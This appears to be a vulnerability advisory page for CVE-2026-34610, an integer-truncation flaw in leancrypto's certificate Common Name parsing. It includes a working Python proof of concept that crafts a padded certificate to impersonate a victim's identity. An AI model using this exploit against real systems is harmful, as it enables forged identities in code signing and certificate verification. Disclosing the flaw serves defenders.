CVE-2026-34610

Description

The leancrypto library is a cryptographic library that exclusively contains only PQC-resistant cryptographic algorithms. Prior to version 1.7.1, lc_x509_extract_name_segment() casts size_t vlen to uint8_t when storing the Common Name (CN) length. An attacker who crafts a certificate with CN = victim's CN + 256 bytes padding gets cn_size = (uint8_t)(256 + N) = N, where N is the victim's CN length. The first N bytes of the attacker's CN are the victim's identity. After parsing, the attacker's certificate has an identical CN to the victim's — enabling identity impersonation in PKCS#7 verification, certificate chain matching, and code signing. This issue has been patched in version 1.7.1.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:leancrypto:leancrypto:*:*:*:*:*:*:*:* - VULNERABLE

leancrypto < 1.7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
import datetime

# Generate a private key for the attacker
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
    backend=default_backend()
)

# Target CN (e.g., "victim.com")
target_cn = "victim.com"
n = len(target_cn)

# Calculate padding to trigger the integer truncation
# The vulnerable code does: cn_size = (uint8_t)(vlen)
# We need vlen = N + 256, so (uint8_t)(N + 256) = N
padding_length = 256
malicious_cn = target_cn + ("A" * padding_length)

print(f"[+] Target CN Length: {n}")
print(f"[+] Malicious CN Length: {len(malicious_cn)}")
print(f"[+] Malicious CN Content: {malicious_cn[:30]}...{malicious_cn[-30:]}")

# Create a self-signed certificate with the malicious CN
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"My Company"),
    # Inject the crafted CN to exploit the truncation bug
    x509.NameAttribute(NameOID.COMMON_NAME, malicious_cn),
])

cert = x509.CertificateBuilder().subject_name(
    subject
).issuer_name(
    issuer
).public_key(
    private_key.public_key()
).serial_number(
    x509.random_serial_number()
).not_valid_before(
    datetime.datetime.utcnow()
).not_valid_after(
    datetime.datetime.utcnow() + datetime.timedelta(days=365)
).sign(private_key, hashes.SHA256(), default_backend())

# Save the malicious certificate
with open("malicious_cert.der", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.DER))

print("[!] Generated malicious_cert.der. When parsed by leancrypto < 1.7.1, the CN will be truncated to 'victim.com'.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34610
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34610
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34610/
[4] VulDB https://vuldb.com/cve/CVE-2026-34610
[5] https://github.com/smuellerDD/leancrypto/commit/5cdcbe12bd6c3d6e87e969972a580b44a74c3a6a
[6] https://github.com/smuellerDD/leancrypto/releases/tag/v1.7.1
[7] https://github.com/smuellerDD/leancrypto/security/advisories/GHSA-636g-jxv4-v4gr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34610", "sourceIdentifier": "[email protected]", "published": "2026-04-02T18:16:32.567", "lastModified": "2026-04-24T13:01:10.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The leancrypto library is a cryptographic library that exclusively contains only PQC-resistant cryptographic algorithms. Prior to version 1.7.1, lc_x509_extract_name_segment() casts size_t vlen to uint8_t when storing the Common Name (CN) length. An attacker who crafts a certificate with CN = victim's CN + 256 bytes padding gets cn_size = (uint8_t)(256 + N) = N, where N is the victim's CN length. The first N bytes of the attacker's CN are the victim's identity. After parsing, the attacker's certificate has an identical CN to the victim's — enabling identity impersonation in PKCS#7 verification, certificate chain matching, and code signing. This issue has been patched in version 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-681"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leancrypto:leancrypto:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.1", "matchCriteriaId": "EEBE3140-06FC-43FD-B7D3-D96E65CD4B38"}]}]}], "references": [{"url": "https://github.com/smuellerDD/leancrypto/commit/5cdcbe12bd6c3d6e87e969972a580b44a74c3a6a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/smuellerDD/leancrypto/releases/tag/v1.7.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/smuellerDD/leancrypto/security/advisories/GHSA-636g-jxv4-v4gr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}